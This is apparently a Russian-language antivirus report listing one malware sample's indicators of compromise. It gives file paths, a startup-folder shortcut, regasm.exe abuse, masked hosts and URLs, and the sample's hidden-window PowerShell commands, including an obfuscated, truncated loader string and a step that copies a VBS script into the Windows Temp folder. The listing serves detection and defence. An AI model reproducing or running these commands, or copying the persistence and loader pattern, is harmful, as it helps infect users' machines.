Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\studio.lnk
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- %WINDIR%\temp\igcc.vbs
- 'im###upload.io':443
- 'pk#.goog':80
- '10#.#75.113.204':80
- http://pk#.goog/gsr1/gsr1.crt
- http://10#.#75.113.204/1252/HBC.txt
- 'im###upload.io':443
- DNS ASK im###upload.io
- DNS ASK pk#.goog
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$Codigo = 'JtuHGUPNKMnnWUBtPBptuHGUPNKMnnWUBtPG0tuHGUPNKMnnWUBtPYQBntuHGUPNKMnnWUBtPGUtuHGUPNKMnnWUBtPVQBytuHGUPNKMnnWUBtPGwtuHGUPNKMnnWUBtPItuHGUPNKMnnWUBtPtuHGUPNKMnnWUBtP9tuHGUPNKM...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden if (-not (Get-ChildItem %WINDIR%\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination %WINDIR%\Temp\IGCC.vbs -Force }' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$Codigo = 'JtuHGUPNKMnnWUBtPBptuHGUPNKMnnWUBtPG0tuHGUPNKMnnWUBtPYQBntuHGUPNKMnnWUBtPGUtuHGUPNKMnnWUBtPVQBytuHGUPNKMnnWUBtPGwtuHGUPNKMnnWUBtPItuHGUPNKMnnWUBtPtuHGUPNKMnnWUBtP9tuHGUPNKM...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden if (-not (Get-ChildItem %WINDIR%\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination %WINDIR%\Temp\IGCC.vbs -Force }
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'